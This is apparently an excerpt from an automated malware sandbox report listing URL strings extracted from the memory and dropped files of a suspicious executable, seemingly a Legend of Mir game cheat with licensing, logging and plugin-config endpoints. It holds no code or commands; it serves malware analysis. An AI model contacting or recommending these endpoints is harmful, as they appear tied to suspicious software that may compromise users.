      Source: D74384FB8D2C9.exe, 00000002.00000003.2842042739.0000000005634000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2219757684.000000000564E000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4567640195.000000000564D000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2336822343.000000000564E000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4584493943.000000000D086000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2841831298.000000000564D000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.3800701119.000000000564D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://182.254.116.116/d?dn=sinacloud.net27.221.16.179;27.221.16.149
      Source: D74384FB8D2C9.exe, 00000002.00000002.4588434411.0000000011410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://182.254.116.116/d?dn=sinacloud.net27.221.16.179;27.221.16.149;p
      Source: D74384FB8D2C9.exe, 00000002.00000003.2336822343.000000000564E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://182.254.116.116/d?dn=sinacloud.net27.221.16.179;27.221.16.149W
      Source: D74384FB8D2C9.exe, 00000002.00000003.3852734717.000000000EB8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://182.254.116.116/d?dn=sinacloud.net5w%
      Source: D74384FB8D2C9.exe, 00000002.00000003.3854584841.000000000EB59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://182.254.116.116/d?dn=sinacloud.net?dn=sinastorage.cn
      Source: D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007D37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://182.254.116.116/d?dn=sinacloud.netC:
      Source: D74384FB8D2C9.exe, 00000002.00000003.3854584841.000000000EB59000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4587864880.000000000EB5E000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2593025818.000000000EB59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://182.254.116.116/d?dn=sinacloud.netLMEMX
      Source: D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007CE0000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.3852734717.000000000EBC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://182.254.116.116/d?dn=sinacloud.netOOC:
      Source: D74384FB8D2C9.exe, 00000002.00000003.3852734717.000000000EB8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://182.254.116.116/d?dn=sinacloud.netm
      Source: D74384FB8D2C9.exe, 00000002.00000002.4563191406.0000000002E29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://182.254.116.116/d?dn=sinacloud.netmAE3
      Source: D74384FB8D2C9.exe, 00000002.00000002.4563191406.0000000002E29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://182.254.116.116/d?dn=sinacloud.netn4
      Source: D74384FB8D2C9.exe, 00000002.00000002.4584493943.000000000D086000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2841831298.000000000564D000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.3800701119.000000000564D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://182.254.116.116/d?dn=sinastorage.cn
      Source: D74384FB8D2C9.exe, 00000002.00000003.2592634274.000000000EB9B000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.3852734717.000000000EB6C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://182.254.116.116/d?dn=sinastorage.cn&
      Source: D74384FB8D2C9.exe, 00000002.00000003.2592634274.000000000EB87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://182.254.116.116/d?dn=sinastorage.cn-w
      Source: D74384FB8D2C9.exe, 00000002.00000003.3804207322.0000000005650000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2842042739.0000000005634000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4567640195.000000000564D000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2842244916.000000000563A000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4584493943.000000000D086000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.3800701119.000000000564D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://182.254.116.116/d?dn=sinastorage.cn49.7.37.97
      Source: D74384FB8D2C9.exe, 00000002.00000002.4584493943.000000000D086000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://182.254.116.116/d?dn=sinastorage.cn49.7.37.97-
      Source: D74384FB8D2C9.exe, 00000002.00000003.2841831298.000000000564D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://182.254.116.116/d?dn=sinastorage.cn49.7.37.97?
      Source: D74384FB8D2C9.exe, 00000002.00000003.2841831298.000000000564D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://182.254.116.116/d?dn=sinastorage.cn49.7.37.97K
      Source: D74384FB8D2C9.exe, 00000002.00000003.2591950560.0000000007CE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://182.254.116.116/d?dn=sinastorage.cn54.116.116/d?dn=sinastorage.cnOOC:
      Source: D74384FB8D2C9.exe, 00000002.00000003.2591950560.0000000007D37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://182.254.116.116/d?dn=sinastorage.cnC:
      Source: D74384FB8D2C9.exe, 00000002.00000003.3854584841.000000000EB59000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4587864880.000000000EB5E000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2593025818.000000000EB59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://182.254.116.116/d?dn=sinastorage.cnLMEMXH;
      Source: D74384FB8D2C9.exe, 00000002.00000003.2592634274.000000000EB87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://182.254.116.116/d?dn=sinastorage.cnMwm
      Source: D74384FB8D2C9.exe, 00000002.00000003.2592634274.000000000EB87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://182.254.116.116/d?dn=sinastorage.cniw
      Source: D74384FB8D2C9.exe, 00000002.00000002.4563512115.0000000003072000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007D5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://182.254.116.116/d?dn=sinastorage.com
      Source: D74384FB8D2C9.exe, 00000002.00000003.3852734717.000000000EB90000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4588166546.000000000EB9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://182.254.116.116/d?dn=sinastorage.com&
      Source: D74384FB8D2C9.exe, 00000002.00000003.3852734717.000000000EB90000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4588166546.000000000EB9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://182.254.116.116/d?dn=sinastorage.com&F
      Source: D74384FB8D2C9.exe, 00000002.00000003.2841831298.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4584493943.000000000D086000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://182.254.116.116/d?dn=sinastorage.com183.60.95.221
      Source: D74384FB8D2C9.exe, 00000002.00000002.4563191406.0000000002E29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://182.254.116.116/d?dn=sinastorage.comAE3
      Source: D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007D5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://182.254.116.116/d?dn=sinastorage.comC:
      Source: D74384FB8D2C9.exe, 00000002.00000003.2593025818.000000000EB59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://182.254.116.116/d?dn=sinastorage.comLMEMX
      Source: D74384FB8D2C9.exe, 00000002.00000002.4563512115.0000000003072000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://182.254.116.116/d?dn=sinastorage.comwuj
      Source: VIP-#U4f1a#U5458#U7248.exe, 00000000.00000002.2067835798.0000000000F56000.00000002.00000001.01000000.00000003.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4511283119.0000000000486000.00000002.00000400.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://cqbox.appchizi.com/time.php
      Source: VIP-#U4f1a#U5458#U7248.exe, 00000000.00000002.2067835798.0000000000F56000.00000002.00000001.01000000.00000003.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4511283119.0000000000486000.00000002.00000400.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://cqbox.applinzi.com/time.php
      Source: VIP-#U4f1a#U5458#U7248.exe, 00000000.00000002.2067835798.0000000000F56000.00000002.00000001.01000000.00000003.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4511283119.0000000000486000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: http://cqbox.applinzi.com/time.phphttp://cqbox.sinaapp.com/time.phphttp://cqbox.appchizi.com/time.ph
      Source: D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://cqbox.applinzi.com/time.phphttp://cqbox.sinaapp.com/time.phphttp://www.baidu.com/http://www.s
      Source: VIP-#U4f1a#U5458#U7248.exe, 00000000.00000002.2067835798.0000000000F56000.00000002.00000001.01000000.00000003.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4511283119.0000000000486000.00000002.00000400.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://cqbox.sinaapp.com/time.php
      Source: D74384FB8D2C9.exe, 00000002.00000002.4567640195.0000000005637000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.3800595709.0000000005655000.00000004.00000020.00020000.00000000.sdmp, 22FD558C8.sys.2.dr, D74384F.sys.2.drString found in binary or memory: http://crl.thawte.com/ThawtePCA.crl0
      Source: svchost.exe, 00000003.00000002.3741348324.000001E17F8CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
      Source: FC14NMPKD.dll.2.dr, 8FD7ijlhc.exe.2.drString found in binary or memory: http://curl.haxx.se/docs/http-cookies.html
      Source: D74384FB8D2C9.exe, 00000002.00000003.2094080254.0000000005645000.00000004.00000020.00020000.00000000.sdmp, B81BTTTQM.dll.2.drString found in binary or memory: http://dt1.hyocr.com:8080
      Source: D74384FB8D2C9.exe, 00000002.00000003.2094080254.0000000005645000.00000004.00000020.00020000.00000000.sdmp, B81BTTTQM.dll.2.drString found in binary or memory: http://dt1.hyocr.com:8080http://dt2.hyocr.com:8080
      Source: D74384FB8D2C9.exe, 00000002.00000003.2094080254.0000000005645000.00000004.00000020.00020000.00000000.sdmp, B81BTTTQM.dll.2.drString found in binary or memory: http://dt2.hyocr.com:8080
      Source: qmgr.db.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
      Source: qmgr.db.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
      Source: qmgr.db.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
      Source: qmgr.db.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
      Source: qmgr.db.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
      Source: qmgr.db.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
      Source: edb.log.3.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
      Source: D74384FB8D2C9.exe, 00000002.00000003.2095066577.0000000005635000.00000004.00000020.00020000.00000000.sdmp, 9683JE76z.dll.2.drString found in binary or memory: http://ip.qq.com/
      Source: D74384FB8D2C9.exe, 00000002.00000003.2095066577.0000000005635000.00000004.00000020.00020000.00000000.sdmp, 9683JE76z.dll.2.drString found in binary or memory: http://ip.qq.com/v1-dll-api.jsdama.com
      Source: D74384FB8D2C9.exe, 00000002.00000002.4567640195.0000000005637000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.3800595709.0000000005655000.00000004.00000020.00020000.00000000.sdmp, 22FD558C8.sys.2.dr, D74384F.sys.2.drString found in binary or memory: http://ocsp.thawte.com0
      Source: B81BTTTQM.dll.2.drString found in binary or memory: http://plugin.config.hyocr.com:8080/hyver.php?ver=%d
      Source: B81BTTTQM.dll.2.drString found in binary or memory: http://plugin.config.hyocr.com:8080/hyver.php?ver=%d&user=%s
      Source: B81BTTTQM.dll.2.drString found in binary or memory: http://plugin.config.hyocr.com:8080/hyver.php?ver=%dhttp://plugin.config.hyocr.com:8080/hyver.php?ve
      Source: B81BTTTQM.dll.2.drString found in binary or memory: http://plugin1.config.hyocr.com:8080/apisvrs.php;http://plugin2.config.hyocr.com:8080/apisvrs.php
      Source: B81BTTTQM.dll.2.drString found in binary or memory: http://plugin1.config.hyocr.com:8080/apisvrs.php;http://plugin2.config.hyocr.com:8080/apisvrs.phpupl
      Source: D74384FB8D2C9.exe, 00000002.00000002.4568816305.0000000006030000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://shoufeifz.qijianfz.
      Source: VIP-#U4f1a#U5458#U7248.exe, 00000000.00000002.2067835798.0000000000F56000.00000002.00000001.01000000.00000003.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2591950560.0000000007CE0000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4511283119.0000000000486000.00000002.00000400.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007CE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shoufeifz.qijianfz.com
      Source: D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007CE0000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4510050768.000000000018D000.00000004.00000010.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2336822343.0000000005645000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shoufeifz.qijianfz.com/
      Source: D74384FB8D2C9.exe, 00000002.00000003.2213442539.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2219458854.0000000005645000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shoufeifz.qijianfz.com/-
      Source: D74384FB8D2C9.exe, 00000002.00000003.2591950560.0000000007CC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shoufeifz.qijianfz.com/...6
      Source: D74384FB8D2C9.exe, 00000002.00000003.2591950560.0000000007CE0000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007CE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shoufeifz.qijianfz.com/...s
      Source: D74384FB8D2C9.exe, 00000002.00000003.2591950560.0000000007CE0000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007CE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shoufeifz.qijianfz.com/7
      Source: D74384FB8D2C9.exe, 00000002.00000003.2591950560.0000000007CE0000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007CE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shoufeifz.qijianfz.com/8871
      Source: D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007D44000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2591950560.0000000007D44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shoufeifz.qijianfz.com/C:
      Source: D74384FB8D2C9.exe, 00000002.00000003.2591950560.0000000007CC2000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007CC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shoufeifz.qijianfz.com/D
      Source: D74384FB8D2C9.exe, 00000002.00000003.2591950560.0000000007CE0000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007CE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shoufeifz.qijianfz.com/EM
      Source: D74384FB8D2C9.exe, 00000002.00000003.2591950560.0000000007CE0000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007CE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shoufeifz.qijianfz.com/Z
      Source: D74384FB8D2C9.exe, 00000002.00000002.4563512115.0000000003072000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shoufeifz.qijianfz.com/d497ea
      Source: D74384FB8D2C9.exe, 00000002.00000003.2591950560.0000000007CC2000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007CC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shoufeifz.qijianfz.com/f
      Source: D74384FB8D2C9.exe, 00000002.00000003.2591950560.0000000007CE0000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007CE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shoufeifz.qijianfz.com/le.css
      Source: D74384FB8D2C9.exe, 00000002.00000003.2591950560.0000000007CE0000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007CE0000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4568816305.0000000005FFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://shoufeifz.qijianfz.com/q
      Source: D74384FB8D2C9.exe, 00000002.00000003.2591950560.0000000007CE0000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007CE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shoufeifz.qijianfz.com/r
      Source: D74384FB8D2C9.exe, 00000002.00000003.2591950560.0000000007CE0000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4563512115.0000000003072000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007CE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shoufeifz.qijianfz.com/style.css
      Source: D74384FB8D2C9.exe, 00000002.00000003.2591950560.0000000007CE0000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007CE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shoufeifz.qijianfz.com/style.css)
      Source: D74384FB8D2C9.exe, 00000002.00000003.2591950560.0000000007CE0000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007CE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shoufeifz.qijianfz.com/style.cssR
      Source: D74384FB8D2C9.exe, 00000002.00000002.4563512115.0000000003072000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shoufeifz.qijianfz.com/tyle.css1Yd
      Source: D74384FB8D2C9.exe, 00000002.00000003.2591950560.0000000007CE0000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007CE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shoufeifz.qijianfz.com/y
      Source: VIP-#U4f1a#U5458#U7248.exe, 00000000.00000002.2067835798.0000000000F56000.00000002.00000001.01000000.00000003.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4511283119.0000000000486000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: http://shoufeifz.qijianfz.comhttp://fuzhu.eno147
      Source: VIP-#U4f1a#U5458#U7248.exe, 00000000.00000002.2067835798.0000000000F56000.00000002.00000001.01000000.00000003.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4511283119.0000000000486000.00000002.00000400.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://sinacloud.net/question/
      Source: VIP-#U4f1a#U5458#U7248.exe, 00000000.00000002.2067835798.0000000000F56000.00000002.00000001.01000000.00000003.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4511283119.0000000000486000.00000002.00000400.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://sinacloud.net/question/http://sinastorage.cn/question/http://sinastorage.com/question/http://
      Source: VIP-#U4f1a#U5458#U7248.exe, 00000000.00000002.2067835798.0000000000F56000.00000002.00000001.01000000.00000003.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4511283119.0000000000486000.00000002.00000400.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://sinastorage.cn/question/
      Source: VIP-#U4f1a#U5458#U7248.exe, 00000000.00000002.2067835798.0000000000F56000.00000002.00000001.01000000.00000003.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4511283119.0000000000486000.00000002.00000400.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://sinastorage.com/question/
      Source: D74384FB8D2C9.exe, 00000002.00000003.3800701119.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4567640195.0000000005637000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4567640195.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.3800595709.0000000005655000.00000004.00000020.00020000.00000000.sdmp, 22FD558C8.sys.2.dr, D74384F.sys.2.drString found in binary or memory: http://th.symcb.com/th.crl0
      Source: D74384FB8D2C9.exe, 00000002.00000003.3800701119.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4567640195.0000000005637000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4567640195.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.3800595709.0000000005655000.00000004.00000020.00020000.00000000.sdmp, 22FD558C8.sys.2.dr, D74384F.sys.2.drString found in binary or memory: http://th.symcb.com/th.crt0
      Source: D74384FB8D2C9.exe, 00000002.00000003.3800701119.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4567640195.0000000005637000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4567640195.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.3800595709.0000000005655000.00000004.00000020.00020000.00000000.sdmp, 22FD558C8.sys.2.dr, D74384F.sys.2.drString found in binary or memory: http://th.symcd.com0&
      Source: D74384FB8D2C9.exe, 00000002.00000002.4582376615.000000000C4D3000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.8pkw.com:5566/kss_api/api.php
      Source: D74384FB8D2C9.exe, 00000002.00000002.4582376615.000000000C4D3000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.8pkw.com:5566/kss_api/api.php103M
      Source: D74384FB8D2C9.exe, 00000002.00000002.4582376615.000000000C43A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.8pkw.com:5566/kss_api/api.php_ksreg_http://www2.8pkw.com/kss_api/api.php_ksreg_13_ksreg_1
      Source: D74384FB8D2C9.exe, 00000002.00000002.4582376615.000000000C4D3000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.8pkw.com:5566/kss_api/io.php
      Source: D74384FB8D2C9.exe, 00000002.00000002.4582376615.000000000C4D3000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.8pkw.com:5566/kss_api/io.php.03M
      Source: D74384FB8D2C9.exe, 00000002.00000002.4582376615.000000000C492000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.8pkw.com:5566/kss_api/io.php?a=uplog&apiver=905&c=0&gdata=1&softcode=1000011&
      Source: D74384FB8D2C9.exe, 00000002.00000002.4582376615.000000000C450000.00000004.00001000.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4582376615.000000000C457000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.8pkw.com:5566/kss_api/io.php?a=uplog&apiver=905&c=0&gdata=1&softcode=1000011&&lgid=0&f=&
      Source: D74384FB8D2C9.exe, 00000002.00000002.4582376615.000000000C457000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.8pkw.com:5566/kss_api/io.php?a=uplog&apiver=905&c=0&gdata=1&softcode=1000011&&lgid=0&f=&3
      Source: D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007CCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.8pkw.com:5566/kss_api/io.php?a=uplog&apiver=905&c=0&gdata=1&softcode=1000011&&lgid=0&f=&x
      Source: D74384FB8D2C9.exe, 00000002.00000002.4582376615.000000000C492000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.8pkw.com:5566/kss_api/io.php?a=uplog&apiver=905&c=0&gdata=1&softcode=1000011&00
      Source: D74384FB8D2C9.exe, 00000002.00000002.4582376615.000000000C492000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.8pkw.com:5566/kss_api/io.php?a=uplog&apiver=905&c=0&gdata=1&softcode=1000011&1
      Source: D74384FB8D2C9.exe, D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://www.A3M2.com
      Source: D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://www.GameM2.com
      Source: D74384FB8D2C9.exe, D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://www.GeeM2.com
      Source: D74384FB8D2C9.exe, D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://www.Haom6.com
      Source: D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://www.Haom6.comhttp://www.GeeM2.comWemade
      Source: D74384FB8D2C9.exe, D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://www.LongZuYQ.com
      Source: D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://www.LongZuYQ.comgame
      Source: VIP-#U4f1a#U5458#U7248.exe, 00000000.00000002.2067835798.0000000000F56000.00000002.00000001.01000000.00000003.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4511283119.0000000000486000.00000002.00000400.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://www.baidu.com/
      Source: D5AESTNHE.dll.2.drString found in binary or memory: http://www.eyuyan.com
      Source: D5AESTNHE.dll.2.drString found in binary or memory: http://www.eyuyan.comservice
      Source: VIP-#U4f1a#U5458#U7248.exe, 00000000.00000002.2067835798.0000000000F56000.00000002.00000001.01000000.00000003.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4511283119.0000000000486000.00000002.00000400.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://www.iqiyi.com/
      Source: D74384FB8D2C9.exe, D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://www.ksfm2.com
